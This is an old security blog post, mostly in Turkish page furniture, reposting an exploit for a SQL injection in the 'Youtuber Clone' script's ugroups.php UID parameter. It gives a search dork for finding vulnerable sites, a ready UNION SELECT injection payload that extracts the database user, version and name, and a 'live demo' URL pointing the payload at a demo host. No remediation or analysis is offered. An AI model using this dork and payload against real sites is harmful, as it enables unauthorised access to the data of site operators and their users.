Securty Information Blog: Youtuber Clone (ugroups.php UID) Remote SQL Injection Vulnerability

28 Temmuz 2008 Pazartesi

Youtuber Clone (ugroups.php UID) Remote SQL Injection Vulnerability

|___________________________________________________|
|
| Youtuber Clone (UID) Remote SQL Injection Vulnerability
|
|___________________________________________________
|                                                   |
|
|
| script : http://www.greatclone.com/product_info.php?cPath=30&products_id=86
|
| DorK   : "Everyone should be on TV! Now you can upload 2 TV"
|
|___________________________________________________|



Exploit: 

www.[target].com/Script/ugroups.php?UID=-1+UNION+SELECT+1,concat_ws(0x3a,user(),version(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15--





L!VE DEMO: :


http://www.demosgreatclone.com/youtubeclone/ugroups.php?UID=-1+UNION+SELECT+1,concat_ws(0x3a,user(),version(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15--

Hiç yorum yok:

Yorum Gönder

Securty Information Blog

28 Temmuz 2008 Pazartesi

Youtuber Clone (ugroups.php UID) Remote SQL Injection Vulnerability

Hiç yorum yok:

Nathalie Kelley

Labels

Blog Archive